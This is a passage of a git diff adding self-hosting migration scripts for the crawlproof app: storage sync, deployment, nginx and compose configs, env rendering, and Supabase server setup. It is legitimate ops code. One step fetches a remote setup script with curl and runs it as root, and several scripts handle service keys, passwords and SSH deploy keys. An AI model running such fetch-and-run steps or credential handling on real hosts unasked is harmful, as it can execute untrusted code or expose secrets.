"$OUT/cron-jobs.sql" || true)" +} > "$OUT/MANIFEST" + +log "Done: $OUT" +cat "$OUT/MANIFEST" diff --git a/ops/selfhost/migrate/sync-storage.mjs b/ops/selfhost/migrate/sync-storage.mjs new file mode 100755 index 00000000..8929dd28 --- /dev/null +++ b/ops/selfhost/migrate/sync-storage.mjs @@ -0,0 +1,143 @@ +#!/usr/bin/env node +// +// Copy every Storage object from the crawlproof Supabase CLOUD project into +// the self-hosted stack, keeping bucket and path identical so the public URLs +// differ only in host. +// +// Uploads go through the Storage API rather than straight onto the disk the +// storage service mounts: the API is what writes storage.objects, and rows +// written by hand would describe files the backend cannot serve. +// +// Usage: +// CLOUD_URL=https://.supabase.co \ +// CLOUD_SERVICE_KEY=... \ +// SELF_URL=https://supabase.crawlproof.com \ +// SELF_SERVICE_KEY=... \ +// node ops/selfhost/migrate/sync-storage.mjs [--concurrency 8] [--dry-run] +// +// Resumable: an object already present in the destination with the same size +// is skipped, so a re-run after a failure only moves what is missing. + +import { readFileSync, appendFileSync } from 'node:fs'; +import { join } from 'node:path'; + +const args = process.argv.slice(2); +const dump = args.find((a) => !a.startsWith('--')); +const dryRun = args.includes('--dry-run'); +const concurrency = Number( + (args.find((a) => a.startsWith('--concurrency')) || '--concurrency=8').split('=')[1] || + args[args.indexOf('--concurrency') + 1] || + 8, +); + +const CLOUD_URL = (process.env.CLOUD_URL || '').replace(/\/$/, ''); +const CLOUD_SERVICE_KEY = process.env.CLOUD_SERVICE_KEY || ''; +const SELF_URL = (process.env.SELF_URL || '').replace(/\/$/, ''); +const SELF_SERVICE_KEY = process.env.SELF_SERVICE_KEY || ''; + +if (!dump) die('usage: sync-storage.mjs '); +for (const [k, v] of Object.entries({ CLOUD_URL, CLOUD_SERVICE_KEY, SELF_URL, SELF_SERVICE_KEY })) { + if (!v) die(`missing env: ${k}`); +} + +function die(msg) { + console.error(`ERROR: ${msg}`); + process.exit(1); +} + +const inventory = readFileSync(join(dump, 'storage-inventory.tsv'), 'utf8') + .split('\n') + .filter(Boolean) + .map((line) => { + const [bucket, isPublic, name, size, mime] = line.split('\t'); + return { bucket, public: isPublic === 't', name, size: Number(size || 0), mime }; + }); + +const failLog = join(dump, 'storage-sync-failures.log'); +const totalBytes = inventory.reduce((n, o) => n + o.size, 0); +console.log( + `${inventory.length} objects, ${(totalBytes / 1024 ** 3).toFixed(2)} GB, concurrency ${concurrency}${dryRun ? ' (dry run)' : ''}`, +); + +let done = 0; +let skipped = 0; +let failed = 0; +let movedBytes = 0; +const started = Date.now(); + +async function headSelf(o) { + // A HEAD through the authenticated object path works for public and private + // buckets alike, so resume does not depend on the bucket being public. + const res = await fetch(`${SELF_URL}/storage/v1/object/${o.bucket}/${encodeURI(o.name)}`, { + method: 'HEAD', + headers: { Authorization: `Bearer ${SELF_SERVICE_KEY}` }, + }); + if (!res.ok) return null; + return Number(res.headers.get('content-length') || 0); +} + +async function downloadCloud(o) { + const res = await fetch(`${CLOUD_URL}/storage/v1/object/${o.bucket}/${encodeURI(o.name)}`, { + headers: { Authorization: `Bearer ${CLOUD_SERVICE_KEY}` }, + }); + if (!res.ok) throw new Error(`download ${res.status}`); + return Buffer.from(await res.arrayBuffer()); +} + +async function uploadSelf(o, body) { + // x-upsert makes a re-run idempotent instead of 409-ing on what is already there. + const res = await fetch(`${SELF_URL}/storage/v1/object/${o.bucket}/${encodeURI(o.name)}`, { + method: 'POST', + headers: { + Authorization: `Bearer ${SELF_SERVICE_KEY}`, + 'Content-Type': o.mime || 'application/octet-stream', + 'x-upsert': 'true', + }, + body, + }); + if (!res.ok) throw new Error(`upload ${res.status} ${(await res.text()).slice(0, 200)}`); +} + +async function one(o) { + try { + const existing = await headSelf(o); + if (existing !== null && existing === o.size && o.size > 0) { + skipped += 1; + return; + } + if (dryRun) return; + const body = await downloadCloud(o); + await uploadSelf(o, body); + movedBytes += o.size; + } catch (err) { + failed += 1; + appendFileSync(failLog, `${o.bucket}\t${o.name}\t${err.message}\n`); + } finally { + done += 1; + if (done % 100 === 0 || done === inventory.length) { + const secs = (Date.now() - started) / 1000; + console.log( + `${done}/${inventory.length} moved=${(movedBytes / 1024 ** 3).toFixed(2)}GB skipped=${skipped} failed=${failed} ${(done / secs).toFixed(1)}/s`, + ); + } + } +} + +// Fixed pool of workers pulling from one shared cursor — a Promise.all over +// chunks would stall every worker on the slowest object in each chunk. +let cursor = 0; +async function worker() { + while (cursor < inventory.length) { + const o = inventory[cursor++]; + await one(o); + } +} +await Promise.all(Array.from({ length: concurrency }, worker)); + +console.log( + `\ndone: ${done} objects, ${(movedBytes / 1024 ** 3).toFixed(2)} GB moved, ${skipped} already present, ${failed} failed`, +); +if (failed) { + console.log(`failures logged to ${failLog} — re-run to retry just those`); + process.exit(1); +} diff --git a/ops/selfhost/migrate/unpark-cron.sh b/ops/selfhost/migrate/unpark-cron.sh new file mode 100755 index 00000000..b746105a --- /dev/null +++ b/ops/selfhost/migrate/unpark-cron.sh @@ -0,0 +1,25 @@ +#!/usr/bin/env bash +# Re-enable the scheduled jobs on the self-hosted database at cutover. +# +# They are loaded parked (see load-selfhost.sh / park-cron): while DNS still +# pointed at Railway, an active job here would have driven a second copy of +# every scheduled action against the live app. Run this only once +# crawlproof.com resolves to dev2 AND the cloud project's jobs are gone, +# otherwise both databases drive the same app. +set -euo pipefail + +SITE=${SITE:-https://crawlproof.com} + +resolved=$(getent hosts crawlproof.com | awk '{print $1}' | head -1) +echo "crawlproof.com resolves to ${resolved:-}" +if [ "$resolved" != "23.95.228.174" ]; then + echo "REFUSING: crawlproof.com does not resolve to dev2 yet — unparking now" >&2 + echo "would point every job at whatever is still serving that name." >&2 + exit 1 +fi + +docker exec -i supabase-db psql -U postgres -h localhost -d postgres -v ON_ERROR_STOP=1 -X < build that revision and switch to it +# deploy-app.sh --rollback go back to the previously deployed sha +# deploy-app.sh --status what is deployed and healthy right now +# +# Builds happen on the box: the image needs NEXT_PUBLIC_* at build time and +# those come from app.env, which never leaves dev2. +# +set -euo pipefail + +ROOT=${ROOT:-/home/anthony/www/crawlproof.com} +APP_DIR="$ROOT/app" +REPO=${REPO:-https://github.com/profullstack/crawlproof.com.git} +APP_PORT=${APP_PORT:-3100} +HEALTH_TIMEOUT=${HEALTH_TIMEOUT:-300} +STATE="$ROOT/.deploy-state" + +log() { printf '\n===> %s\n' "$*"; } +die() { printf 'ERROR: %s\n' "$*" >&2; exit 1; } + +compose() { (cd "$ROOT" && docker compose -f docker-compose.app.yml --env-file "$ROOT/deploy.env" "$@"); } + +health() { + local i + for i in $(seq 1 "$((HEALTH_TIMEOUT / 5))"); do + if curl -fsS -m 5 -o /dev/null "http://127.0.0.1:${APP_PORT}/"; then return 0; fi + sleep 5 + done + return 1 +} + +case "${1:-}" in + --status) + compose ps + curl -fsS -m 5 -o /dev/null -w 'app http %{http_code} in %{time_total}s\n' "http://127.0.0.1:${APP_PORT}/" || echo "app not answering" + [ -f "$STATE" ] && cat "$STATE" + exit 0 + ;; + --rollback) + [ -f "$STATE" ] || die "no deploy state to roll back to" + # shellcheck disable=SC1090 + . "$STATE" + [ -n "${PREVIOUS_SHA:-}" ] || die "no PREVIOUS_SHA recorded" + log "Rolling back to $PREVIOUS_SHA" + exec "$0" "$PREVIOUS_SHA" + ;; +esac + +TARGET=${1:?usage: deploy-app.sh | --rollback | --status} + +[ -f "$ROOT/app.env" ] || die "missing $ROOT/app.env (the app's secrets)" +[ -f "$ROOT/deploy.env" ] || die "missing $ROOT/deploy.env (ports, build args)" + +CURRENT="" +[ -d "$APP_DIR/.git" ] && CURRENT=$(git -C "$APP_DIR" rev-parse HEAD 2>/dev/null || echo "") + +if [ ! -d "$APP_DIR/.git" ]; then + log "First deploy: cloning $REPO" + git clone --filter=blob:none "$REPO" "$APP_DIR" +fi + +log "Fetching $TARGET" +git -C "$APP_DIR" fetch --all --tags --prune + +# Resolve to a sha before checking out. `git checkout --detach ` reports +# the useless "--detach does not take a path argument" when the ref does not +# exist, and a bare branch name only resolves locally — this repo's default +# branch is master, so `main` is not a ref at all. +SHA=$(git -C "$APP_DIR" rev-parse --verify --quiet "origin/$TARGET^{commit}" \ + || git -C "$APP_DIR" rev-parse --verify --quiet "$TARGET^{commit}" \ + || true) +[ -n "$SHA" ] || die "cannot resolve '$TARGET' to a commit (origin/$TARGET does not exist either)" +git -C "$APP_DIR" checkout --detach "$SHA" +log "At $SHA" + +log "Building" +compose build app + +log "Starting" +compose up -d + +if health; then + log "Healthy" + { + echo "DEPLOYED_SHA=$SHA" + echo "PREVIOUS_SHA=$CURRENT" + echo "DEPLOYED_AT=$(date -u +%FT%TZ)" + } > "$STATE" + compose ps +else + log "UNHEALTHY after ${HEALTH_TIMEOUT}s — last 60 lines:" + compose logs --tail 60 app || true + if [ -n "$CURRENT" ]; then + log "Restoring $CURRENT" + git -C "$APP_DIR" checkout --detach "$CURRENT" + compose build app && compose up -d + health && log "Restored to $CURRENT" || log "ROLLBACK ALSO UNHEALTHY — site is down" + fi + die "deploy of $SHA failed health check" +fi diff --git a/ops/selfhost/server/docker-compose.app.yml b/ops/selfhost/server/docker-compose.app.yml new file mode 100644 index 00000000..cb241d64 --- /dev/null +++ b/ops/selfhost/server/docker-compose.app.yml @@ -0,0 +1,69 @@ +# crawlproof.com on dev2 — the app container (Next.js + audit worker, both +# started by start.sh) and the Redis the prober queue needs. +# +# Lives at /home/anthony/www/crawlproof.com/docker-compose.app.yml. +# nginx on the host terminates TLS and proxies to 127.0.0.1:${APP_PORT}. +# +# The Supabase stack is a separate compose project in ./supabase; the app +# reaches it over the host's loopback gateway, not a shared compose network, +# so either side can be restarted without the other noticing. + +services: + app: + container_name: crawlproof-app + build: + context: ./app + dockerfile: Dockerfile + args: + # Next.js inlines NEXT_PUBLIC_* at build time, so these must be + # present for `next build`, not just at runtime. + NEXT_PUBLIC_SITE_URL: ${NEXT_PUBLIC_SITE_URL} + NEXT_PUBLIC_SUPABASE_URL: ${NEXT_PUBLIC_SUPABASE_URL} + NEXT_PUBLIC_SUPABASE_ANON_KEY: ${NEXT_PUBLIC_SUPABASE_ANON_KEY} + NEXT_SERVER_ACTIONS_ENCRYPTION_KEY: ${NEXT_SERVER_ACTIONS_ENCRYPTION_KEY} + restart: unless-stopped + env_file: + - ./app.env + environment: + PORT: 3000 + WORKER_PORT: 9080 + WORKER_URL: http://127.0.0.1:9080 + HOSTNAME: 0.0.0.0 + NODE_ENV: production + ports: + - "127.0.0.1:${APP_PORT:-3100}:3000" + extra_hosts: + # Lets the app reach the Supabase gateway and Redis on the host without + # putting both compose projects on one network. + - "host.docker.internal:host-gateway" + healthcheck: + test: ["CMD-SHELL", "node -e \"fetch('http://127.0.0.1:3000/').then(r=>process.exit(r.ok?0:1)).catch(()=>process.exit(1))\""] + interval: 30s + timeout: 10s + retries: 5 + start_period: 90s + logging: + driver: json-file + options: { max-size: "50m", max-file: "3" } + + redis: + container_name: crawlproof-redis + image: redis:7-alpine + restart: unless-stopped + command: ["redis-server", "--requirepass", "${REDIS_PASSWORD}", "--appendonly", "yes"] + volumes: + - ./volumes/redis:/data + ports: + # The app reaches it over the bridge; the prober droplet reaches it on + # the public port, which ufw opens only to that one address. + - "${REDIS_BIND:-127.0.0.1}:${REDIS_PORT:-6379}:6379" + healthcheck: + test: ["CMD-SHELL", "redis-cli -a \"$$REDIS_PASSWORD\" ping | grep -q PONG"] + interval: 30s + timeout: 5s + retries: 5 + environment: + REDIS_PASSWORD: ${REDIS_PASSWORD} + logging: + driver: json-file + options: { max-size: "50m", max-file: "3" } diff --git a/ops/selfhost/server/nginx-crawlproof.conf b/ops/selfhost/server/nginx-crawlproof.conf new file mode 100644 index 00000000..7ff02f31 --- /dev/null +++ b/ops/selfhost/server/nginx-crawlproof.conf @@ -0,0 +1,90 @@ +# crawlproof.com on dev2 — nginx terminates TLS for the app and for the +# Supabase gateway. Install at /etc/nginx/sites-available/crawlproof.com and +# symlink into sites-enabled. +# +# certbot --nginx manages the ssl_certificate lines; this file is written +# HTTP-only on purpose so `certbot --nginx -d ...` can add TLS itself and own +# the renewal. Run it once per server_name group. + +# sites-available files are included at http scope, so the map belongs here +# rather than in a separate conf.d snippet someone has to remember to add. +# Without it $connection_upgrade is empty and every websocket 400s. +map $http_upgrade $connection_upgrade { + default upgrade; + '' close; +} + +# ---------------------------------------------------------------- the app +server { + listen 80; + listen [::]:80; + server_name crawlproof.com www.crawlproof.com; + + # Ad creatives and audit PDFs both post bodies well over the 1m default. + client_max_body_size 50m; + + # The tracker hashes the client IP and geolocates it, so the real address + # has to survive the proxy hop or every hit looks like it came from + # 127.0.0.1 and lands in one geo bucket. + real_ip_header X-Forwarded-For; + + access_log /var/log/nginx/crawlproof.access.log; + error_log /var/log/nginx/crawlproof.error.log; + + location / { + proxy_pass http://127.0.0.1:3100; + proxy_http_version 1.1; + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto $scheme; + proxy_set_header X-Forwarded-Host $host; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection $connection_upgrade; + + # Audits render pages in Chromium and can legitimately take minutes. + proxy_connect_timeout 15s; + proxy_send_timeout 300s; + proxy_read_timeout 300s; + proxy_buffering off; + } +} + +# ---------------------------------------------------- the supabase gateway +server { + listen 80; + listen [::]:80; + server_name supabase.crawlproof.com; + + # Storage uploads go through here; 9.8 GB of objects arrive this way + # during the migration and ad assets after it. + client_max_body_size 512m; + + # PostgREST filters travel in the URI, and the worker's autobid sweep sends + # `id=in.(...)` lists over a thousand ids long. nginx's default 8k header + # buffer rejects those with 414 before they ever reach the gateway, which + # the app only reports as "autobid sweep failed". Supabase cloud and + # Railway both accepted them, so this is a regression introduced purely by + # putting nginx in front. + large_client_header_buffers 8 64k; + + access_log /var/log/nginx/supabase-crawlproof.access.log; + error_log /var/log/nginx/supabase-crawlproof.error.log; + + location / { + proxy_pass http://127.0.0.1:8000; + proxy_http_version 1.1; + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto $scheme; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection $connection_upgrade; + + # Realtime holds websockets open for promo_list / promo_post. + proxy_connect_timeout 15s; + proxy_send_timeout 3600s; + proxy_read_timeout 3600s; + proxy_buffering off; + } +} diff --git a/ops/selfhost/server/render-app-env.mjs b/ops/selfhost/server/render-app-env.mjs new file mode 100644 index 00000000..9e73c738 --- /dev/null +++ b/ops/selfhost/server/render-app-env.mjs @@ -0,0 +1,129 @@ +#!/usr/bin/env node +// +// Build /home/anthony/www/crawlproof.com/app.env from three inputs: +// +// 1. the Railway export (every app secret as it runs today) +// 2. crawlproof-connection.env (the self-hosted Supabase keys) +// 3. the overrides below (what has to change because the host changed) +// +// Run on dev2. Writes 0600. The Railway export is the only thing that has to +// be copied onto the box, and it should be deleted once this has run. +// +// Usage: +// node render-app-env.mjs [--out /path/app.env] [--print] +// +// --print lists the keys and where each value came from, never the values. + +import { readFileSync, writeFileSync } from 'node:fs'; + +const args = process.argv.slice(2); +const varsFile = args.find((a) => !a.startsWith('--')); +const outIdx = args.indexOf('--out'); +const OUT = outIdx >= 0 ? args[outIdx + 1] : '/home/anthony/www/crawlproof.com/app.env'; +const CONN = process.env.CONN_ENV || '/home/anthony/www/crawlproof.com/supabase/crawlproof-connection.env'; +const printOnly = args.includes('--print'); + +if (!varsFile) { + console.error('usage: render-app-env.mjs [--out path] [--print]'); + process.exit(1); +} + +// ---- 1. Railway export. Accepts either the raw GraphQL response or a +// plain {KEY: value} object, so it works with `railway variables +// --json` as well as an API dump. +const raw = JSON.parse(readFileSync(varsFile, 'utf8')); +const railway = raw?.data?.variables ?? raw; + +// Railway injects one RAILWAY_SERVICE__URL for every service in the +// shared project (56 of them here) plus its own metadata. None of it means +// anything off Railway. +const railwayNoise = /^RAILWAY_/; + +// ---- 2. the self-hosted Supabase keys +function parseEnvFile(path) { + const out = {}; + for (const line of readFileSync(path, 'utf8').split('\n')) { + const m = line.match(/^([A-Za-z_][A-Za-z0-9_]*)=(.*)$/); + if (m) out[m[1]] = m[2]; + } + return out; +} +const conn = parseEnvFile(CONN); + +for (const k of ['NEXT_PUBLIC_SUPABASE_URL', 'NEXT_PUBLIC_SUPABASE_ANON_KEY', 'SUPABASE_SERVICE_ROLE_KEY']) { + if (!conn[k]) { + console.error(`ERROR: ${CONN} has no ${k} — run setup-supabase.sh first`); + process.exit(1); + } +} + +// ---- 3. what changes because the host changed +const REDIS_PASSWORD = process.env.REDIS_PASSWORD || ''; +if (!REDIS_PASSWORD) { + console.error('ERROR: set REDIS_PASSWORD (the same one docker-compose.app.yml uses)'); + process.exit(1); +} + +const overrides = { + // Supabase now answers on our own gateway. + NEXT_PUBLIC_SUPABASE_URL: conn.NEXT_PUBLIC_SUPABASE_URL, + NEXT_PUBLIC_SUPABASE_ANON_KEY: conn.NEXT_PUBLIC_SUPABASE_ANON_KEY, + SUPABASE_SERVICE_ROLE_KEY: conn.SUPABASE_SERVICE_ROLE_KEY, + SUPABASE_DB_PASSWORD: conn.SELFHOST_POSTGRES_PASSWORD, + + // Redis moved off redis.railway.internal. It is a service in the SAME + // compose file as the app, so it is reachable by service name on the + // project network. Going through host.docker.internal instead fails with + // ETIMEDOUT, because the published port is bound to 127.0.0.1 and the + // gateway address is not that. (host.docker.internal is still how the app + // reaches the Supabase stack, which is a separate compose project.) + REDIS_URL: `redis://default:${REDIS_PASSWORD}@redis:6379`, + + // The worker still runs beside the app inside the same container. + WORKER_URL: 'http://127.0.0.1:9080', + WORKER_PORT: '9080', + + NEXT_PUBLIC_SITE_URL: 'https://crawlproof.com', +}; + +const merged = {}; +for (const [k, v] of Object.entries(railway)) { + if (railwayNoise.test(k)) continue; + merged[k] = v; +} +const source = {}; +for (const k of Object.keys(merged)) source[k] = 'railway'; +for (const [k, v] of Object.entries(overrides)) { + source[k] = k in merged ? 'override (was railway)' : 'override (new)'; + merged[k] = v; +} + +if (printOnly) { + const keys = Object.keys(merged).sort(); + console.log(`${keys.length} keys\n`); + for (const k of keys) console.log(` ${k.padEnd(38)} ${source[k]}`); + process.exit(0); +} + +// GITHUB_APP_PRIVATE_KEY is a PEM and carries real newlines, and lib/env.ts +// reads it straight out of process.env expecting them (it does no \n +// unescaping). An unquoted multi-line value makes docker compose fail the +// whole file with `unexpected character "+" in variable name`, naming the +// second line of the PEM. Compose keeps real newlines inside a double-quoted +// value, so quote anything multi-line and escape what would end the quote. +const encode = (v) => { + const s = String(v ?? ''); + if (!/[\n\r"]/.test(s)) return s; + return `"${s.replace(/\\/g, '\\\\').replace(/"/g, '\\"')}"`; +}; + +const body = Object.keys(merged) + .sort() + .map((k) => `${k}=${encode(merged[k])}`) + .join('\n'); + +writeFileSync(OUT, `# crawlproof app env, rendered by render-app-env.mjs on ${new Date().toISOString()}\n${body}\n`, { + mode: 0o600, +}); +console.log(`wrote ${OUT} with ${Object.keys(merged).length} keys`); +console.log(`overridden: ${Object.keys(overrides).join(', ')}`); diff --git a/ops/selfhost/server/setup-app-host.sh b/ops/selfhost/server/setup-app-host.sh new file mode 100755 index 00000000..408115ed --- /dev/null +++ b/ops/selfhost/server/setup-app-host.sh @@ -0,0 +1,62 @@ +#!/usr/bin/env bash +# +# Prepare the host side of the app deploy: directory ownership, the Redis data +# directory, and the ssh key GitHub Actions uses. Run as root on dev2, once. +# +# The ownership split is the point of this script. `anthony` deploys, so it +# owns the app files and app.env; `supabase/` stays root-owned because it holds +# the database's God Mode keys and a deploy has no business reading them. +set -euo pipefail + +ROOT=${ROOT:-/home/anthony/www/crawlproof.com} +USER_NAME=${USER_NAME:-anthony} + +log() { printf '\n===> %s\n' "$*"; } + +log "App files to $USER_NAME, supabase/ to root" +install -d -o "$USER_NAME" -g "$USER_NAME" -m 2750 "$ROOT" +for f in app.env deploy.env docker-compose.app.yml deploy-app.sh; do + [ -e "$ROOT/$f" ] && chown "$USER_NAME:$USER_NAME" "$ROOT/$f" +done +[ -e "$ROOT/app.env" ] && chmod 600 "$ROOT/app.env" +[ -e "$ROOT/deploy.env" ] && chmod 600 "$ROOT/deploy.env" +[ -e "$ROOT/deploy-app.sh" ] && chmod 755 "$ROOT/deploy-app.sh" +[ -d "$ROOT/app" ] && chown -R "$USER_NAME:$USER_NAME" "$ROOT/app" +[ -d "$ROOT/supabase" ] && { chown root:root "$ROOT/supabase"; chmod 2750 "$ROOT/supabase"; } + +# redis:7-alpine's entrypoint drops to uid 999 before exec'ing redis-server, so +# a bind-mounted data directory owned by the deploy user is unwritable. Redis +# starts anyway and only fails later, at the first BGSAVE, after which it +# refuses EVERY write with "MISCONF Redis is configured to save RDB snapshots, +# but it's currently unable to persist to disk" — which surfaces in the app as +# failing BullMQ commands, not as a Redis permissions error. +log "Redis data directory to uid 999 (redis)" +install -d -m 750 "$ROOT/volumes/redis" +chown -R 999:1000 "$ROOT/volumes/redis" +ls -ldn "$ROOT/volumes/redis" + +log "Deploy key for GitHub Actions" +KEY=/home/$USER_NAME/.ssh/id_ed25519_deploy +install -d -o "$USER_NAME" -g "$USER_NAME" -m 700 "/home/$USER_NAME/.ssh" +if [ ! -f "$KEY" ]; then + sudo -u "$USER_NAME" ssh-keygen -t ed25519 -N '' -C "github-actions-deploy@crawlproof" -f "$KEY" +fi +touch "/home/$USER_NAME/.ssh/authorized_keys" +chown "$USER_NAME:$USER_NAME" "/home/$USER_NAME/.ssh/authorized_keys" +chmod 600 "/home/$USER_NAME/.ssh/authorized_keys" +grep -qF "$(cat "$KEY.pub")" "/home/$USER_NAME/.ssh/authorized_keys" \ + || cat "$KEY.pub" >> "/home/$USER_NAME/.ssh/authorized_keys" + +log "Checks" +sudo -u "$USER_NAME" bash -c "docker ps >/dev/null 2>&1 && echo 'docker: ok' || echo 'docker: DENIED'" +sudo -u "$USER_NAME" bash -c "head -c1 $ROOT/app.env >/dev/null 2>&1 && echo 'app.env: readable' || echo 'app.env: DENIED'" +sudo -u "$USER_NAME" bash -c "head -c1 $ROOT/supabase/.env >/dev/null 2>&1 && echo 'supabase/.env: READABLE (WRONG)' || echo 'supabase/.env: correctly denied'" + +cat < %s\n' "$*"; } +warn() { printf 'WARNING: %s\n' "$*" >&2; } +die() { printf 'ERROR: %s\n' "$*" >&2; exit 1; } + +[ "$SKIP_SYSTEM" = 1 ] || [ "$(id -u)" = 0 ] || die "run as root (or SKIP_SYSTEM=1 for a rehearsal)" + +backup() { # never overwrite without a numbered copy beside the original + local f=$1 n=1 dir name base ext + [ -e "$f" ] || return 0 + dir=$(dirname "$f") + name=$(basename "$f") + if [[ "${name#.}" == *.* ]]; then base=${name%.*} ext=".${name##*.}"; else base=$name ext=""; fi + while [ -e "$dir/$base.bak-$(printf %03d $n)$ext" ]; do n=$((n + 1)); done + cp -a "$f" "$dir/$base.bak-$(printf %03d $n)$ext" +} + +ssh_ports() { + ss -ltnpH 2>/dev/null | awk '/"sshd"/ {n=split($4,a,":"); print a[n]}' | sort -u +} + +# ---------------------------------------------------------------- 1. system +system_setup() { + log "Base packages" + export DEBIAN_FRONTEND=noninteractive + apt-get update -qq + apt-get install -qq -y curl ca-certificates openssl jq ufw >/dev/null + + log "Docker log rotation" + mkdir -p /etc/docker + if [ ! -s /etc/docker/daemon.json ]; then + printf '{\n "log-driver": "json-file",\n "log-opts": { "max-size": "50m", "max-file": "3" }\n}\n' > /etc/docker/daemon.json + systemctl reload docker 2>/dev/null || true + elif ! grep -q max-size /etc/docker/daemon.json; then + warn "/etc/docker/daemon.json exists without log rotation; left untouched" + fi + + log "Firewall" + local p ports + ports=$(ssh_ports) + [ -n "$ports" ] || ports=22 + for p in $ports; do ufw allow "$p/tcp" >/dev/null; done + ufw allow "$DB_PORT/tcp" >/dev/null + ufw allow 80/tcp >/dev/null + ufw allow 443/tcp >/dev/null + ufw --force enable >/dev/null + # Docker publishes ports through its own iptables chains, ahead of ufw, so + # the rules above document intent; the real gate for 5432 is pg_hba + TLS. + ufw status | sed 's/^/ /' +} + +# ------------------------------------------------------------- 2. supabase +supabase_setup() { + mkdir -p "$INSTALL_ROOT" + if [ -f "$DIR/.env" ] && [ -f "$DIR/docker-compose.yml" ]; then + log "Supabase project already at $DIR; keeping its secrets" + return + fi + log "Supabase $SUPABASE_REF into $DIR" + local tmp + tmp=$(mktemp -d) + curl -fsSL "https://raw.githubusercontent.com/supabase/supabase/$SUPABASE_REF/docker/setup.sh" -o "$tmp/setup.sh" + local flags=(--ref "$SUPABASE_REF" -p "$PROJECT" -y) + [ "$SKIP_SYSTEM" = 1 ] && flags+=(--skip-deps) + # setup.sh prints every generated secret; keep that off the terminal (and + # out of whatever ssh session is watching) in a root-only log instead. + local slog="$INSTALL_ROOT/$PROJECT-setup.log" + (umask 077 && : > "$slog") + if ! (cd "$INSTALL_ROOT" && bash "$tmp/setup.sh" "${flags[@]}") >> "$slog" 2>&1; then + grep -E '^(===>|ERROR|WARNING)' "$slog" | tail -n 20 >&2 + die "Supabase setup.sh failed; full log (contains secrets): $slog" + fi + grep -E '^===>' "$slog" | grep -v -i 'key\|secret' | sed 's/^/ /' || true + rm -rf "$tmp" +} + +set_env() { # set_env KEY VALUE -> replace or append in $DIR/.env + local k=$1 v=$2 + if grep -q "^$k=" "$DIR/.env"; then + # Rewrite with awk, not sed: these values carry /, |, & and + freely and + # every sed delimiter would eventually collide with one of them. + awk -v k="$k" -v v="$v" 'BEGIN{FS="="} $1==k {print k "=" v; next} {print}' "$DIR/.env" > "$DIR/.env.tmp" + mv "$DIR/.env.tmp" "$DIR/.env" + else + printf '%s=%s\n' "$k" "$v" >> "$DIR/.env" + fi +} +get_env() { grep "^$1=" "$DIR/.env" | head -n1 | cut -d= -f2-; } + +configure_env() { + log "Configuring .env" + backup "$DIR/.env" + set_env SUPABASE_PUBLIC_URL "https://$STUDIO_DOMAIN" + set_env API_EXTERNAL_URL "https://$STUDIO_DOMAIN" + set_env SITE_URL "$SITE_URL" + set_env ADDITIONAL_REDIRECT_URLS "${SITE_URL}/**,https://www.crawlproof.com/**" + set_env POOLER_TENANT_ID crawlproof + set_env STUDIO_DEFAULT_ORGANIZATION "Profullstack" + set_env STUDIO_DEFAULT_PROJECT "crawlproof" + set_env API_GW_HTTP_PORT "$KONG_HTTP_PORT" + set_env KONG_HTTP_PORT "$KONG_HTTP_PORT" + # crawlproof signs its own users up through GoTrue; keep signup on and keep + # confirmation required (the cloud project confirmed 94 of 113). + set_env DISABLE_SIGNUP false + set_env ENABLE_ANONYMOUS_USERS false + set_env ENABLE_EMAIL_SIGNUP true + set_env ENABLE_EMAIL_AUTOCONFIRM false + if [ -n "$SMTP_PASS" ]; then + set_env SMTP_HOST "$SMTP_HOST" + set_env SMTP_PORT "$SMTP_PORT" + set_env SMTP_USER "$SMTP_USER" + set_env SMTP_PASS "$SMTP_PASS" + set_env SMTP_SENDER_NAME "$SMTP_SENDER_NAME" + set_env SMTP_ADMIN_EMAIL "$SMTP_ADMIN_EMAIL" + else + warn "SMTP_PASS not set; GoTrue cannot send magic links until it is" + fi + set_env COMPOSE_FILE "docker-compose.yml:docker-compose.crawlproof.yml" + chmod 600 "$DIR/.env" +} + +# --------------------------------------------------------------- 4. postgres +detect_resources() { + MEM_MB=${MEM_MB:-$(awk '/MemTotal/ {print int($2/1024)}' /proc/meminfo)} + CPUS=${CPUS:-$(nproc)} +} + +write_tls() { + local tls="$DIR/volumes/crawlproof/tls" + mkdir -p "$tls" + if [ ! -s "$tls/server.key" ]; then + log "Self-signed TLS certificate for $DB_DOMAIN (10 years)" + openssl req -x509 -nodes -newkey ec -pkeyopt ec_paramgen_curve:prime256v1 \ + -days 3650 -subj "/CN=$DB_DOMAIN" -addext "subjectAltName=DNS:$DB_DOMAIN" \ + -keyout "$tls/server.key" -out "$tls/server.crt" 2>/dev/null + fi + chmod 600 "$tls/server.key" + chmod 644 "$tls/server.crt" + chown "$PG_UID:$PG_GID" "$tls/server.key" "$tls/server.crt" +} + +write_pg_hba() { + cat > "$DIR/volumes/crawlproof/pg_hba.conf" < "$DIR/volumes/crawlproof/crawlproof.conf" < "$DIR/docker-compose.crawlproof.yml" +} + +# ------------------------------------------------------------------ 5. start +compose() { (cd "$DIR" && docker compose "$@"); } + +start_stack() { + log "Starting the stack" + compose up -d --wait || compose up -d + # A config change on an already-running db needs a restart to take effect. + compose restart db >/dev/null + + local i + for i in $(seq 1 90); do + docker exec supabase-db pg_isready -U postgres -h localhost >/dev/null 2>&1 && break + sleep 2 + done +} + +sql_admin() { docker exec -i supabase-db psql -U supabase_admin -h localhost -d postgres -v ON_ERROR_STOP=1 -X -q -At "$@"; } + +# Four things self-hosted/v0.8.2 leaves in a state the services cannot start +# from. All four were hit on a clean initdb of this release, and all four are +# idempotent, so this runs on every pass. +# +# 1. The service roles' passwords do not match POSTGRES_PASSWORD, so +# PostgREST, GoTrue and Storage all crashloop on "password authentication +# failed for user authenticator / supabase_auth_admin / +# supabase_storage_admin". +# 2. auth.uid() and friends are created owned by supabase_admin, but GoTrue +# migrates as supabase_auth_admin and does `create or replace`, which +# fails with "must be owner of function uid". +# 3. graphql_public does not exist, and PostgREST is configured with +# db-schemas=public,graphql_public, so it refuses to build a schema cache +# and answers 403 to everything. +# 4. _realtime does not exist, and Realtime connects with +# `SET search_path TO _realtime`, then dies with "no schema has been +# selected to create in". +repair_bootstrap() { + log "Repairing the bootstrap gaps in $SUPABASE_REF" + local pw + pw=$(get_env POSTGRES_PASSWORD) + sql_admin </dev/null | tail -1 | 